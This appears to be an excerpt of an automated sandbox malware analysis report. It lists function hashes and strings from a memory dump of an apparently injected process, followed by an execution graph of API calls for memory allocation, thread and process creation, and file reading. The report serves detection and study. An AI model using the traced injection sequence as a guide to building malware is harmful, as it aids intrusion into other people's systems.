                                                            • Opcode Fuzzy Hash: 9e1cdc5b9502a09ffeb0773bbc725db7b81b99687e9ab44ee0360ed4fdadd7f3
                                                            • Instruction Fuzzy Hash: 7D90022130140802D102B55844196060009C7D1345FD5C122E1424655E87658E53A132
                                                            Function 03662EE0 Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6c06e478629c1f4577fc9b4ef4c913ccad4059ccef2a698f5bf7f18f2026008b
                                                            • Instruction ID: 71c272ef9cc2dfece30b9d80370bf03294710a1625f9fd9639b7f2e4e324cf97
                                                            • Opcode Fuzzy Hash: 6c06e478629c1f4577fc9b4ef4c913ccad4059ccef2a698f5bf7f18f2026008b
                                                            • Instruction Fuzzy Hash: 4390026120180803D140B9584809607000587D0302F95C121A2064655F8B698D516135
                                                            Function 03662EA0 Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 31f00c17a3f6a046f2f7c1f2df3d54374d9aec3a72442f53f9bd325bde38bab9
                                                            • Instruction ID: 7fb54cb64e2131f851a59fe14059526d0c6c482b14db14b7b41a95e2f251ba8d
                                                            • Opcode Fuzzy Hash: 31f00c17a3f6a046f2f7c1f2df3d54374d9aec3a72442f53f9bd325bde38bab9
                                                            • Instruction Fuzzy Hash: 7890027120140802D140B5584409746000587D0301F95C121A5064654F87998ED56665
                                                            Function 03662E80 Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 35ee4347c96912d34907aa6621676b50428e2e583fef70b4696701b84e259585
                                                            • Instruction ID: a68348c3b2df9870c3cfc056b6c49d2748309e21134090d4c0636b394bb52f7a
                                                            • Opcode Fuzzy Hash: 35ee4347c96912d34907aa6621676b50428e2e583fef70b4696701b84e259585
                                                            • Instruction Fuzzy Hash: FD90022160140902D101B5584409616000A87D0241FD5C132A1024655FCB658E92A131
                                                            Function 03663D70 Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8221d7c39a162196edbc622dafc472084ca26f75271d1126e642c0fd372fe15c
                                                            • Instruction ID: cacb834b6917f752b71615db465f01ecd9a5fa6322db634618e7f316cd356fef
                                                            • Opcode Fuzzy Hash: 8221d7c39a162196edbc622dafc472084ca26f75271d1126e642c0fd372fe15c
                                                            • Instruction Fuzzy Hash: 1690023520140802D510B5585809646004687D0301F95D521A0424658E87948DA1A121
                                                            Function 03662D30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6c7cc297991045fb9594c95bc29b5238394510d23f535198d070a95a9288027e
                                                            • Instruction ID: b52060ead1f4ff308b269d5c3ebeda77a7585aa1dee75ed8366d731772b84f62
                                                            • Opcode Fuzzy Hash: 6c7cc297991045fb9594c95bc29b5238394510d23f535198d070a95a9288027e
                                                            • Instruction Fuzzy Hash: 3A90022130140403D140B558541D6064005D7E1301F95D121E0414654DDA558D565222
                                                            Function 03662D00 Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 355fdff07c7e3ffd9305178796f4006cf8245a9382915a36ee3cdb141ab9298c
                                                            • Instruction ID: 7b5e628ab6e2284f5b024e06e31468901166fbc6145edbfe77c4f1047c1e8ecd
                                                            • Opcode Fuzzy Hash: 355fdff07c7e3ffd9305178796f4006cf8245a9382915a36ee3cdb141ab9298c
                                                            • Instruction Fuzzy Hash: D190022120544842D100B958540DA06000587D0205F95D121A1064695EC7758D51A131
                                                            Function 03662D10 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 81fbdece5530b8734e10e1a1decd90b24fb705c88aac132fdb08ba58e6301238
                                                            • Instruction ID: 15519958592867abb5b91d902920f4e3b815471e093943ec677628d1e6e6a361
                                                            • Opcode Fuzzy Hash: 81fbdece5530b8734e10e1a1decd90b24fb705c88aac132fdb08ba58e6301238
                                                            • Instruction Fuzzy Hash: 6D90022921340402D180B558540D60A000587D1202FD5D525A0015658DCA558D695321
                                                            Function 03663D10 Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2be1d778a89f85b951468016067fa11f106e392591a6cc92d7a4df38b08735e2
                                                            • Instruction ID: 3e5a1aa68cb5913feb75845e4eba1a511b6e951272c9e35a5fe6d55ad6514d5b
                                                            • Opcode Fuzzy Hash: 2be1d778a89f85b951468016067fa11f106e392591a6cc92d7a4df38b08735e2
                                                            • Instruction Fuzzy Hash: 61900231202405429540B6585809A4E410587E1302BD5D525A0015654DCA548D615221
                                                            Function 03662DD0 Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4aaa9756659e483f834df9aae0a0c2917beb578135876263270041bb131732ee
                                                            • Instruction ID: 3d74853d1caf42b1dfe73d3297af56bb80e0eba177af568d4dbb467faf8d3ff1
                                                            • Opcode Fuzzy Hash: 4aaa9756659e483f834df9aae0a0c2917beb578135876263270041bb131732ee
                                                            • Instruction Fuzzy Hash: 36900221242445525545F5584409507400697E02417D5C122A1414A50D86669D56D621
                                                            Function 03662DB0 Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5aff121548e15750c6ffdcbca6f30e37b1e8853db2c7d377e2719acccfaead15
                                                            • Instruction ID: 71e6f563d4146e70890a7ace5c16e42a3520ab7ef0108ba1a69bec562afdabb4
                                                            • Opcode Fuzzy Hash: 5aff121548e15750c6ffdcbca6f30e37b1e8853db2c7d377e2719acccfaead15
                                                            • Instruction Fuzzy Hash: 3590023124140802D141B5584409606000997D0241FD5C122A0424654F87958F56AA61
                                                            Function 03662C60 Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3eda8bc309c583b07d476c3d0ea9b3118877dd11bf6f8893480ba5819b5f733c
                                                            • Instruction ID: 6bf1ad2501b6272cdc3c3a8e7dde87a2f51435cc80eaae9a9b8622bd4080335a
                                                            • Opcode Fuzzy Hash: 3eda8bc309c583b07d476c3d0ea9b3118877dd11bf6f8893480ba5819b5f733c
                                                            • Instruction Fuzzy Hash: 9990023120140C42D100B5584409B46000587E0301F95C126A0124754E8755CD517521
                                                            Function 03662CF0 Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 32ed282e326bf065773fb7d672ae600978a30cbcaeeccf41af5d7ccfb2090938
                                                            • Instruction ID: 53e4a8ee99b404762a169d11b523b46d57ffddaee7c6c60281c61d2b3a8a75f3
                                                            • Opcode Fuzzy Hash: 32ed282e326bf065773fb7d672ae600978a30cbcaeeccf41af5d7ccfb2090938
                                                            • Instruction Fuzzy Hash: F390023120140803D100B558550D707000587D0201F95D521A0424658ED7968D516121
                                                            Function 03662CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 22fd3174689b40ce1176ee5be6b3fa583588ab64aae72ad9a1547bab5f003df1
                                                            • Instruction ID: 7ae8a555a8e3f6e9246a00ad9e0217d57320662cdd3e78c47561e76fb0d566ad
                                                            • Opcode Fuzzy Hash: 22fd3174689b40ce1176ee5be6b3fa583588ab64aae72ad9a1547bab5f003df1
                                                            • Instruction Fuzzy Hash: 2B90022160540802D140B558541D706001587D0201F95D121A0024654EC7998F5566A1
                                                            Function 03662CA0 Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7b240b67db38b5955166734665946d6e6f85186cd0efc62ffcb42a9b8a58d126
                                                            • Instruction ID: 24f7c4e18f9bf86d15e3d6dcd9eee7de4b067016a61f584e4b8b661773b5bbd4
                                                            • Opcode Fuzzy Hash: 7b240b67db38b5955166734665946d6e6f85186cd0efc62ffcb42a9b8a58d126
                                                            • Instruction Fuzzy Hash: 3690023120140802D100B998540D646000587E0301F95D121A5024655FC7A58D916131
                                                            Function 03662C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                            • Instruction ID: 55c58ddb2b2366da8cf7a6299fcbeafdb14841ffc936e621b8366ad5fe5fbba0
                                                            • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                            • Instruction Fuzzy Hash:
                                                            Function 03662890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID: ___swprintf_l
                                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                            • API String ID: 48624451-2108815105
                                                            • Opcode ID: 3e14f71ff07961ae7d9e89e3077a0c0b3e9838ff7cd385459e096ab92f5d435c
                                                            • Instruction ID: 501b73687000d6beedaf6bb041200a630e4b8fcfb7d432bc4f705340ed623d43
                                                            • Opcode Fuzzy Hash: 3e14f71ff07961ae7d9e89e3077a0c0b3e9838ff7cd385459e096ab92f5d435c
                                                            • Instruction Fuzzy Hash: C15106B6B00116BFDB10DB98C99097EF7FCBB48240754866EE465D7741E234DE448BA0
                                                            Function 03657630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 03694742
                                                            • Execute=1, xrefs: 03694713
                                                            • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 03694725
                                                            • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 03694655
                                                            • ExecuteOptions, xrefs: 036946A0
                                                            • CLIENT(ntdll): Processing section info %ws..., xrefs: 03694787
                                                            • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 036946FC
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                            • API String ID: 0-484625025
                                                            • Opcode ID: 6dcb941a22c5de050a5be80c6825e23ad008967b7b6213b90924fbf8468d8b34
                                                            • Instruction ID: a9fa779a72a064736771cb4d92516b39675a516112475a1c5d59208498632fae
                                                            • Opcode Fuzzy Hash: 6dcb941a22c5de050a5be80c6825e23ad008967b7b6213b90924fbf8468d8b34
                                                            • Instruction Fuzzy Hash: F1511B35601319AEDF11EBA8DD99FAE77ACEF05300F0400B9E905AB2C1EB719E518F55
                                                            Function 0366B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID: __aulldvrm
                                                            • String ID: +$-$0$0
                                                            • API String ID: 1302938615-699404926
                                                            • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                            • Instruction ID: a0efc56d900d627dd8875402aa9acdd97f388257e2db96744382572b8ce63d76
                                                            • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                            • Instruction Fuzzy Hash: BD81EF30E01249DEDF24CE6AC9917FEBBB6AF45390F1C415ED861E7391C73498518B64
                                                            Function 0364F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • RTL: Re-Waiting, xrefs: 0369031E
                                                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 036902BD
                                                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 036902E7
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                            • API String ID: 0-2474120054
                                                            • Opcode ID: 2e95a3556dec56e6475ae47c5da56192476accedad61ab741cf7d4650be07b8b
                                                            • Instruction ID: 96acdf829f38e3b73dd27b6d84fd55d053941a5a536dfeb38ec7b35d23946ae6
                                                            • Opcode Fuzzy Hash: 2e95a3556dec56e6475ae47c5da56192476accedad61ab741cf7d4650be07b8b
                                                            • Instruction Fuzzy Hash: 77E1AE30A047419FEB24CF28CA84B2AB7E4BF89314F180A5EE5A58F3E1D775D855CB46
                                                            Function 0365BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • RTL: Resource at %p, xrefs: 03697B8E
                                                            • RTL: Re-Waiting, xrefs: 03697BAC
                                                            • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 03697B7F
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                            • API String ID: 0-871070163
                                                            • Opcode ID: e8e4739758e639a4db1eed8b7fc7ab9c849135c9c35f4ecd53a324eacc2a89a7
                                                            • Instruction ID: f2620157903c568582016d882e8093aeb5611a9ccf7478dfb0b2024b2062e0b3
                                                            • Opcode Fuzzy Hash: e8e4739758e639a4db1eed8b7fc7ab9c849135c9c35f4ecd53a324eacc2a89a7
                                                            • Instruction Fuzzy Hash: E941E2353007029FDB24CE69DD41B6AB7E9EF88720F140A2DF95ADB380DB70E8058B95
                                                            Function 0365B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0369728C
                                                            Strings
                                                            • RTL: Resource at %p, xrefs: 036972A3
                                                            • RTL: Re-Waiting, xrefs: 036972C1
                                                            • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 03697294
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                            • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                            • API String ID: 885266447-605551621
                                                            • Opcode ID: 71e15e6aa85e5100f199dc2bda27f0a39ef1ce3f2f5cd02826e45890bc1ce743
                                                            • Instruction ID: 47c011bc6f504fc0e13fda2701bd781a30ff3bfee91eb8c18539e18f2636f165
                                                            • Opcode Fuzzy Hash: 71e15e6aa85e5100f199dc2bda27f0a39ef1ce3f2f5cd02826e45890bc1ce743
                                                            • Instruction Fuzzy Hash: 5B41F035710606ABDB20CE64CD41B6AB7A9FF84711F18062AFC55EF340DB20E8528BE9
                                                            Function 03667D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID: __aulldvrm
                                                            • String ID: +$-
                                                            • API String ID: 1302938615-2137968064
                                                            • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                            • Instruction ID: 1ce5f8d0655dcc6618c8c6c9fec5a920994f6483338b8a86805be6e48f5ff6e6
                                                            • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                            • Instruction Fuzzy Hash: 3491C470E0021A9FDF24DF69C980ABEB7B9EF847A8F18451AE865E73C0D7349941CB50
                                                            Function 03629126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: $$@
                                                            • API String ID: 0-1194432280
                                                            • Opcode ID: 7a4f99eff21169d661690755cddd34003c04ad8e674f7e0ef59a3c58760f6381
                                                            • Instruction ID: beba8cb147338651408ca8b30f3629ae47544de6c535190a6880cc2768e6f08e
                                                            • Opcode Fuzzy Hash: 7a4f99eff21169d661690755cddd34003c04ad8e674f7e0ef59a3c58760f6381
                                                            • Instruction Fuzzy Hash: B4815976D002699BDB21DF54CD54BEABAB8AF49700F0441EAE909B7280D7309E80CFA4
                                                            Function 036ACEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • @_EH4_CallFilterFunc@8.LIBCMT ref: 036ACFBD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID: CallFilterFunc@8
                                                            • String ID: @$@4rw@4rw
                                                            • API String ID: 4062629308-2979693914
                                                            • Opcode ID: 3fd4adbbea85c4aafd24cd7943ad669761b37d8286ab827764e236aa9d8c3c6d
                                                            • Instruction ID: 04f078289911eaaec5116166afc53f813995c23dfe62fdbf92de0e5373bb030a
                                                            • Opcode Fuzzy Hash: 3fd4adbbea85c4aafd24cd7943ad669761b37d8286ab827764e236aa9d8c3c6d
                                                            • Instruction Fuzzy Hash: 88419DBA900618DFDB21DFA9C940AAEBBB8EF45B00F04842EE915EB354D734D801DF65

                                                            Execution Graph

                                                            Execution Coverage:3.2%
                                                            Dynamic/Decrypted Code Coverage:4.5%
                                                            Signature Coverage:1.4%
                                                            Total number of Nodes:507
                                                            Total number of Limit Nodes:78
                                                            execution_graph 80233 57b250 80236 599cb0 80233->80236 80235 57c8c1 80239 597fb0 80236->80239 80238 599cdd 80238->80235 80240 59803a 80239->80240 80242 597fd4 80239->80242 80241 598050 NtAllocateVirtualMemory 80240->80241 80241->80238 80242->80238 80747 579810 80748 57981f 80747->80748 80749 579860 80748->80749 80750 57984d CreateThread 80748->80750 80751 585590 80752 5974c0 LdrInitializeThunk 80751->80752 80753 5855c6 80752->80753 80756 597ef0 80753->80756 80755 5855db 80757 597f77 80756->80757 80758 597f17 80756->80758 80761 3012e80 LdrInitializeThunk 80757->80761 80758->80755 80759 597fa8 80759->80755 80761->80759 80243 597cd0 80244 597d6c 80243->80244 80246 597cf4 80243->80246 80245 597d82 NtReadFile 80244->80245 80247 590fd0 80252 590fdf 80247->80252 80248 591069 80249 591026 80255 599d30 80249->80255 80252->80248 80252->80249 80253 591064 80252->80253 80254 599d30 RtlFreeHeap 80253->80254 80254->80248 80258 5981b0 80255->80258 80257 591036 80259 5981cd 80258->80259 80260 5981de RtlFreeHeap 80259->80260 80260->80257 80762 597310 80763 597334 80762->80763 80764 597394 80762->80764 80767 3012ee0 LdrInitializeThunk 80764->80767 80765 5973c5 80767->80765 80768 2dfcc94 NtReadVirtualMemory 80769 2dfcc81 80768->80769 80769->80768 80770 2dfcb80 80769->80770 80771 3012ad0 LdrInitializeThunk 80772 582e8c 80773 5875c0 2 API calls 80772->80773 80774 582e9c 80773->80774 80775 582eb1 80774->80775 80776 597e60 NtClose 80774->80776 80776->80775 80261 58f640 80262 58f643 80261->80262 80267 584270 80262->80267 80264 58f67b 80266 58f7fa 80264->80266 80272 595bb0 80264->80272 80269 584294 80267->80269 80268 58429b 80268->80264 80269->80268 80270 5842d0 LdrLoadDll 80269->80270 80271 5842e7 80269->80271 80270->80271 80271->80264 80273 595c0d 80272->80273 80274 595c40 80273->80274 80277 58f917 RtlFreeHeap 80273->80277 80274->80266 80276 595c22 80276->80266 80277->80276 80278 586dc0 80279 586e32 80278->80279 80280 586dd8 80278->80280 80280->80279 80282 58a9e0 80280->80282 80283 58aa06 80282->80283 80284 58ac25 80283->80284 80309 598240 80283->80309 80284->80279 80286 58aa7c 80286->80284 80312 59af40 80286->80312 80288 58aa98 80288->80284 80289 58ab69 80288->80289 80318 5974c0 80288->80318 80292 585480 LdrInitializeThunk 80289->80292 80293 58ab88 80289->80293 80292->80293 80297 58ac0d 80293->80297 80330 597090 80293->80330 80294 58ab51 80326 587940 80294->80326 80295 58aafd 80295->80284 80295->80294 80296 58ab2f 80295->80296 80322 585480 80295->80322 80345 593660 LdrInitializeThunk 80296->80345 80303 587940 LdrInitializeThunk 80297->80303 80305 58ac1b 80303->80305 80304 58abe4 80335 597130 80304->80335 80305->80279 80307 58abfe 80340 597270 80307->80340 80310 59825a 80309->80310 80311 59826b CreateProcessInternalW 80310->80311 80311->80286 80313 59aeb0 80312->80313 80314 59af0d 80313->80314 80346 599e10 80313->80346 80314->80288 80316 59aeea 80317 599d30 RtlFreeHeap 80316->80317 80317->80314 80319 5974da 80318->80319 80352 3012c0a 80319->80352 80320 58aaf4 80320->80289 80320->80295 80323 585483 80322->80323 80355 597690 80323->80355 80325 5854be 80325->80296 80327 587953 80326->80327 80361 5973d0 80327->80361 80329 58797e 80329->80279 80331 597102 80330->80331 80332 5970b4 80330->80332 80367 30139b0 LdrInitializeThunk 80331->80367 80332->80304 80333 597127 80333->80304 80336 5971a2 80335->80336 80338 597154 80335->80338 80368 3014340 LdrInitializeThunk 80336->80368 80337 5971c7 80337->80307 80338->80307 80341 5972e5 80340->80341 80343 597297 80340->80343 80369 3012fb0 LdrInitializeThunk 80341->80369 80342 59730a 80342->80297 80343->80297 80345->80294 80349 598160 80346->80349 80348 599e2b 80348->80316 80350 59817a 80349->80350 80351 59818b RtlAllocateHeap 80350->80351 80351->80348 80353 3012c11 80352->80353 80354 3012c1f LdrInitializeThunk 80352->80354 80353->80320 80354->80320 80356 597732 80355->80356 80358 5976b4 80355->80358 80360 3012d10 LdrInitializeThunk 80356->80360 80357 597777 80357->80325 80358->80325 80360->80357 80362 597443 80361->80362 80364 5973f4 80361->80364 80366 3012dd0 LdrInitializeThunk 80362->80366 80363 597468 80363->80329 80364->80329 80366->80363 80367->80333 80368->80337 80369->80342 80777 580880 80778 580890 80777->80778 80779 584270 LdrLoadDll 80778->80779 80780 5808b8 80779->80780 80781 5808fd 80780->80781 80782 5808ec PostThreadMessageW 80780->80782 80782->80781 80783 58bc80 80784 58bca9 80783->80784 80785 58bdad 